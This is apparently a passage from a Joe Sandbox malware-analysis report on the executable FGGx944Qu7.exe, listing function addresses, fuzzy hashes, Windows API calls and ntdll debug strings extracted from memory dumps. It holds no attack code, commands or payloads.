Opcode Fuzzy Hash: 49baeabd0120d91c0868bb86b7ff64b8648b52c812373d639657bea5416951e9
Instruction Fuzzy Hash: 5F12B8B0C8574DCADB22CF69E95C18DBBB1B74039CBD04A09D2622F2E1DBB4156ACF44

Function 015EDFEC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683850240.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3de0299383273667dc607508010978e787b7c0c06fe3f5152f623033d3476d31
Instruction ID: 71846fe1a3cc4510d946197ad677a0a07ff42a647eef39a418a5c2f44639e6d6
Opcode Fuzzy Hash: 3de0299383273667dc607508010978e787b7c0c06fe3f5152f623033d3476d31
Instruction Fuzzy Hash: 1BA14932E1021ACFCF09DFB5C84859EBBF2FF85300B15856AE905AF265DB31A956CB50

Function 054E0006 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692837045.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 696db2790bf6add67ac4a8c13039ccac2a6e6a44921502c2e148c42b15edd89f
Instruction ID: 3af7fdfb4eab517324864a2bab18cc5a287327a048ae2c7bf7fede9adac84095
Opcode Fuzzy Hash: 696db2790bf6add67ac4a8c13039ccac2a6e6a44921502c2e148c42b15edd89f
Instruction Fuzzy Hash: 50C13FB0C8574DCBDB22CF78E85818DBBB1BB8139CB954A19D1626F2E1DBB41466CF40

Analysis Process: FGGx944Qu7.exePID: 7620, Parent PID: 7252COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5%
Signature Coverage:	7.9%
Total number of Nodes:	140
Total number of Limit Nodes:	8

Executed Functions

Function 00417393 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417405

Memory Dump Source

Source File: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_FGGx944Qu7.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 3e1e084428a271c5e890f20eadbc4fdd9c42662fc0071a7a85dff5490e354e7b
Instruction ID: 983eccb0d9070b947cec14170c1ff7600f84878ffbb2ec511f095524d7b6e595
Opcode Fuzzy Hash: 3e1e084428a271c5e890f20eadbc4fdd9c42662fc0071a7a85dff5490e354e7b
Instruction Fuzzy Hash: DD015EB1E0020DABDB10DBA1DC42FDEB7B89B54308F0041AAED0897240F634EB54CBA5

Function 0042AEF3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0042AF27

Memory Dump Source

Source File: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_FGGx944Qu7.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4a5ac6fb77712cc44b6120c2bd66755c4763242f7f5e6b92fb92394acb07962f
Instruction ID: c4abd25a57bcd16b73887625e8331067d77142ac5b1abb611dfbf8421b2a6b2d
Opcode Fuzzy Hash: 4a5ac6fb77712cc44b6120c2bd66755c4763242f7f5e6b92fb92394acb07962f
Instruction Fuzzy Hash: CEE08C722006187FC220EA6AEC41F9B776DDFC5714F10842EFA08A7281C7B4BA1187F8

Function 01632B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01632B6A

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfb913cfb9417f983b2bb24b09b4b1a6a97253413c51bc11673bfcbe18a03fa0
Instruction ID: f69ad049271d937c089985f5e00baab9da26ee3fbad2be2d97a993f78067156f
Opcode Fuzzy Hash: dfb913cfb9417f983b2bb24b09b4b1a6a97253413c51bc11673bfcbe18a03fa0
Instruction Fuzzy Hash: 2A90026120240003420575984814617400E97E0201B55C021E5014690EC56589D16225

Function 01632DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01632DFA

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 91ac4241249d8f7a9bb681fedf6b15a3999bbcc223f99239de94cfd5a6055412
Instruction ID: 6b674a2f9c65fce485aa0d2d0dbc036f06efb567f1a7589d07351ad5c573ff5a
Opcode Fuzzy Hash: 91ac4241249d8f7a9bb681fedf6b15a3999bbcc223f99239de94cfd5a6055412
Instruction Fuzzy Hash: 9E90023120140413D21175984904707000D97D0241F95C412A4424658ED6968A92A221

Function 01632C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01632C7A

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8e3f33c16256b81e05532d6ed420c9f053a32911e33415ef32aa1202ac6fa55c
Instruction ID: e0d79772ede89fcb84cd39a8bd9225071bc294d4ebdd98ae26d8af0b49fdc6a7
Opcode Fuzzy Hash: 8e3f33c16256b81e05532d6ed420c9f053a32911e33415ef32aa1202ac6fa55c
Instruction Fuzzy Hash: 2890023120148803D2107598880474B000997D0301F59C411A8424758EC6D589D17221

Function 016335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 016335CA

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e861b1646b2a8c0cb5acc61c341f24e7326d1fd7b3477626c31cb221838ad5ac
Instruction ID: a3e7c9068f5909efa7290601bc2dd6c7353e7d7068041fe51621f3e442e4deb2
Opcode Fuzzy Hash: e861b1646b2a8c0cb5acc61c341f24e7326d1fd7b3477626c31cb221838ad5ac
Instruction Fuzzy Hash: 7090023160550403D20075984914707100997D0201F65C411A4424668EC7D58A9166A2

Function 0041395D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

20291vC, xrefs: 00413A3F, 00413A49, 00413A5A
20291vC, xrefs: 00413A51, 00413A54

Memory Dump Source

Source File: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_FGGx944Qu7.jbxd

Yara matches

Similarity

API ID:
String ID: 20291vC$20291vC
API String ID: 0-2689376105
Opcode ID: 3c56daa68365ae1257591dccb2f529202d61b9c2a31d102e02bb92bfdf499e62
Instruction ID: 3adf7d5e13c6de488dbdc0bca8a40b745c153015bea7a23b2f969a6d22e710d2
Opcode Fuzzy Hash: 3c56daa68365ae1257591dccb2f529202d61b9c2a31d102e02bb92bfdf499e62
Instruction Fuzzy Hash: 003115B2540148BED712CDB48C828DFBFA8DB8579774041ABD580DF153D3258A838BD8

Function 004139CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(20291vC,00000111,00000000,00000000), ref: 00413A4A

Strings

20291vC, xrefs: 00413A3F, 00413A49, 00413A5A
20291vC, xrefs: 00413A51, 00413A54

Memory Dump Source

Source File: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_FGGx944Qu7.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 20291vC$20291vC
API String ID: 1836367815-2689376105
Opcode ID: b72ba3d245daded5e5b19e3e555da31f929ca410c7913d57171912fdf11b53a6
Instruction ID: 95f6ce0d95cf0bb4ceacc06999243570636f411bc224c4503cab1e2a4c835456
Opcode Fuzzy Hash: b72ba3d245daded5e5b19e3e555da31f929ca410c7913d57171912fdf11b53a6
Instruction Fuzzy Hash: 7B01E5B1D0011CBAEB10AAA58C82DEF7B7CDF45794F40806AFA54B7141D27C4F0687E5

Function 004139D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(20291vC,00000111,00000000,00000000), ref: 00413A4A

Strings

20291vC, xrefs: 00413A3F, 00413A49, 00413A5A
20291vC, xrefs: 00413A51, 00413A54

Memory Dump Source

Source File: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_FGGx944Qu7.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 20291vC$20291vC
API String ID: 1836367815-2689376105
Opcode ID: 5f08af33e8b7efe506fa4673a3393caf6412ce17949638dfc63c1ccd38673b2a
Instruction ID: 9a218634c2300583fa073fc399c2a42d08732a879ca4b3ecc7372beb63fb1603
Opcode Fuzzy Hash: 5f08af33e8b7efe506fa4673a3393caf6412ce17949638dfc63c1ccd38673b2a
Instruction Fuzzy Hash: 5601C4B1D0021CBAEB10AAE19C82DEF7B7CDF45794F40806AFA54A7141D6784E0687E5

Function 0042B243 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B282

Strings

NaA, xrefs: 0042B246

Memory Dump Source

Source File: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_FGGx944Qu7.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: NaA
API String ID: 3298025750-4168634936
Opcode ID: 4b5deda8a02acb89d003fbc1655a66652fff29ff2d130aca1072be1cedad8abc
Instruction ID: 90625cf0bce89957b9a731c4ef8eb509d2373e3a81719cf97dfa8759568fdcbe
Opcode Fuzzy Hash: 4b5deda8a02acb89d003fbc1655a66652fff29ff2d130aca1072be1cedad8abc
Instruction Fuzzy Hash: 0EE06DB22002047FD710EE59EC41F9B37ACEFC9714F004419FA08A7282C670B9108AF9

Function 0042B1F3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041DBBB,?,?,00000000,?,0041DBBB,?,?,?), ref: 0042B232

Memory Dump Source

Source File: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_FGGx944Qu7.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8cce53396a8d562068ec0237ad1140c88de556f26adbbeaf56aee8588ccd0c9e
Instruction ID: 9cf74e59a693c944cb33df9f7372979f237c9503f95bce2a4eae2ab6d70f08c4
Opcode Fuzzy Hash: 8cce53396a8d562068ec0237ad1140c88de556f26adbbeaf56aee8588ccd0c9e
Instruction Fuzzy Hash: 5FE0EDB12042187BD714EE59EC45FAB77ADEFC5714F004419FA08A7281D6B5B9108BF9

Function 0042B293 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,EC5978D7,?,?,EC5978D7), ref: 0042B2C7

Memory Dump Source

Source File: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_FGGx944Qu7.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1a11dc23db3771e1c88795f3d33f9f07b9c6b22290fb4dcfc97e051d7719c7e4
Instruction ID: 3938dbb34fb28cda393c814cd9ff7fcda516f3f78a49436ac6352ef36a6b2f0a
Opcode Fuzzy Hash: 1a11dc23db3771e1c88795f3d33f9f07b9c6b22290fb4dcfc97e051d7719c7e4
Instruction Fuzzy Hash: F8E086752012147FC220EA5ADC05FDB775DDFC5714F00842AFA08A7181CA74791187F5

Function 01632C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01632C24

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 691341e1390decf34118a79a6c3607b3356d52784cbe3e0815e7a1994d80e2e4
Instruction ID: 19d8bfe9fa1af02e80e7f17f3686d75dcc2bd1000b2a34baae90155968a3b88a
Opcode Fuzzy Hash: 691341e1390decf34118a79a6c3607b3356d52784cbe3e0815e7a1994d80e2e4
Instruction Fuzzy Hash: 39B09B719015C5C6DB51F7A44E08717790477D0701F15C065D2030751F4778D1D1E275

Non-executed Functions

Function 01672349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

TracingFlags, xrefs: 01672549
UseImpersonatedDeviceMap, xrefs: 0167251C
DisableExceptionChainValidation, xrefs: 0167275F
ShutdownFlags, xrefs: 016724A1
UnloadEventTraceDepth, xrefs: 016724C0
LdrpInitializeExecutionOptions, xrefs: 0167317D
@, xrefs: 01672B74
@, xrefs: 01672942
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01673176
GlobalFlag, xrefs: 01672F3F, 01673059
GlobalFlag2, xrefs: 01672FC0
minkernel\ntdll\ldrinit.c, xrefs: 01673187
MaxLoaderThreads, xrefs: 016724EC
DisableHeapLookaside, xrefs: 0167246D
RaiseExceptionOnPossibleDeadlock, xrefs: 01672579
MinimumStackCommitInBytes, xrefs: 01672BB0
CFGOptions, xrefs: 01672967
FrontEndHeapDebugOptions, xrefs: 01672489
MaxDeadActivationContexts, xrefs: 01672D82
ExecuteOptions, xrefs: 016725A0

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 1d0adff9e80d4c721d559de1e32bf41ad22c2ab08a5247cea87b604b92668551
Instruction ID: 88cb0b0bab8eb04a0d2621743475e3e0ae41d143f3eb2d54cc2a7fe3418a7182
Opcode Fuzzy Hash: 1d0adff9e80d4c721d559de1e32bf41ad22c2ab08a5247cea87b604b92668551
Instruction Fuzzy Hash: 4F929B71A04342AFE725CE28CC90B6BB7E9BB84754F04492DFA95DB390D770E844CB92

Function 01628620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread identifier, xrefs: 0166553A
Critical section address., xrefs: 01665502
double initialized or corrupted critical section, xrefs: 01665508
Address of the debug info found in the active list., xrefs: 016654AE, 016654FA
undeleted critical section in freed memory, xrefs: 0166542B
Thread is in a state in which it cannot own a critical section, xrefs: 01665543
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0166540A, 01665496, 01665519
Critical section address, xrefs: 01665425, 016654BC, 01665534
Invalid debug info address of this critical section, xrefs: 016654B6
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016654E2
Critical section debug info address, xrefs: 0166541F, 0166552E
8, xrefs: 016652E3
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016654CE
corrupted critical section, xrefs: 016654C2

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 6d6cff5f6ef03425f71e883cd4ae89fa6cb344e6c7174edf7110c26bb988e011
Instruction ID: 64e4d1aaa42da5143803fccd83e54b162d2644d194b87fe0895441af599787ef
Opcode Fuzzy Hash: 6d6cff5f6ef03425f71e883cd4ae89fa6cb344e6c7174edf7110c26bb988e011
Instruction Fuzzy Hash: 26819A70A00359EFDB20CF9ACC46FAEBBF9BB48B04F104119E509BB240D771A945CB60

Function 016229F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016622E4
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01662498
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01662506
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01662409
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016625EB
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016624C0
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01662412
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01662624
RtlpResolveAssemblyStorageMapEntry, xrefs: 0166261F
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01662602
@, xrefs: 0166259B

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: e5e65aac598aa962cfeec36852f1a191d8923d363053e8ef6141e7db0523ac79
Instruction ID: ecd7afbe50c8e141c2bfbd4ac1cee8a6e0b617541c4661a4d194151b68938589
Opcode Fuzzy Hash: e5e65aac598aa962cfeec36852f1a191d8923d363053e8ef6141e7db0523ac79
Instruction Fuzzy Hash: AF026EB1D006299BDB71DB58CC90BEAB7B8AB54704F4041EEE609B7241EB309E85CF59

Function 01698B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

svchost.exe, xrefs: 01698B68
lsass.exe, xrefs: 01698BA1
heapType, xrefs: 01698BCB
SegmentHeap, xrefs: 01698BE9
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01698BD0
runtimebroker.exe, xrefs: 01698B73
csrss.exe, xrefs: 01698B80
DefaultBrowser_NOPUBLISHERID, xrefs: 01698D00
smss.exe, xrefs: 01698B8B
services.exe, xrefs: 01698B96

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 62a3f5898e110b0a97e1fe03a93793b9030432120c31a548a4589374696a96cb
Instruction ID: 38779ee59c09126c4aa320304aea83f29d6ac5e3d8c321a493f72075e60b9889
Opcode Fuzzy Hash: 62a3f5898e110b0a97e1fe03a93793b9030432120c31a548a4589374696a96cb
Instruction Fuzzy Hash: F851E0721043499FCB29CF188C44BABBBECFF9A644F14091DEA59C7241E770D508CB92

Function 016A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to %Ix bytes, xrefs: 016A05F1
About to reallocate block at %p to %Ix bytes, xrefs: 016A03BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 016A04D3
HEAP[%wZ]: , xrefs: 016A0399, 016A04A8, 016A05D0, 016A0675, 016A06CC
RtlReAllocateHeap, xrefs: 016A02BF, 016A0362
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 016A06EA
HEAP: , xrefs: 016A03A6, 016A04B5, 016A05DD, 016A0682, 016A06D9
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 016A069F

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 1f543428f7331b0d80a38d79918e53941158bc6a7d2268323e1e9741c74c9879
Instruction ID: 6a56389ec2f2d299cd64e2519948cea2c38e482177c0f669b85f70334ace90b0
Opcode Fuzzy Hash: 1f543428f7331b0d80a38d79918e53941158bc6a7d2268323e1e9741c74c9879
Instruction Fuzzy Hash: 76D1B931A00696DFDB26DFA8C844AAABBF2FF4A704F488059E4859F352C734AD41CF54

Function 016789B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDlls, xrefs: 01678CBD
AVRF: -*- final list of providers -*- , xrefs: 01678B8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01678A67
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01678A3D
VerifierFlags, xrefs: 01678C50
VerifierDebug, xrefs: 01678CA5
HandleTraces, xrefs: 01678C8F

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 850915e7f6ba586f61b5152611951c48b315cd7995ede1511223e524121e77ef
Instruction ID: abc6f70b3044a3aa85969ade6ec45ee411e84592be5d814096f79a8a2a419947
Opcode Fuzzy Hash: 850915e7f6ba586f61b5152611951c48b315cd7995ede1511223e524121e77ef
Instruction Fuzzy Hash: BD912472A05712AFD721EF6C8C88B2A7BE9BB94B28F04465CFA416F241D7709C01CB95

Function 015FEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 015FEB62
LdrpResSearchResourceInsideDirectory Enter, xrefs: 015FEB58
LdrpResSearchResourceInsideDirectory Exit, xrefs: 015FEB6C
{, xrefs: 01654643
, xrefs: 015FF299
T, xrefs: 015FEB4E

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: ebb89b3e2de0cb3fac7f414622f906beb4bb98b4bb5e68356fa73ef98fd8c7d9
Instruction ID: ff9cc841f2065d7eada68ed40ee72f3b02152182f44cf78accda8996e629ee9a
Opcode Fuzzy Hash: ebb89b3e2de0cb3fac7f414622f906beb4bb98b4bb5e68356fa73ef98fd8c7d9
Instruction Fuzzy Hash: AAA21875A0562A8FDB64DF19CC887ADBBB5FB45304F1542DADA09AB250EB309EC5CF00

Function 016263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 016641FE
Delaying execution failed with status 0x%08lx, xrefs: 01664258
_LdrpInitialize, xrefs: 016640DF, 01664141, 01664205, 0166425F
minkernel\ntdll\ldrinit.c, xrefs: 016640E9, 0166414B, 0166420F, 01664269
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 016640D8
Process initialization failed with status 0x%08lx, xrefs: 0166413A

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: f8fb67b3d1b24f3075d08cc3a005a4e1b71ebba2ddfc4aadd17b7d97b95757f6
Instruction ID: b5489c60090c34ec4363d801ec93518d46b71e2adf9f6da58ae8647a5e85ad32
Opcode Fuzzy Hash: f8fb67b3d1b24f3075d08cc3a005a4e1b71ebba2ddfc4aadd17b7d97b95757f6
Instruction Fuzzy Hash: E5912671B01726DBEB35DF58DC44BAA7BAABB50B14F20821DE9016F381DB709842CB95

Function 015E645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 015E6496
LdrpInitShimEngine, xrefs: 016499F4, 01649A07, 01649A30
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016499ED
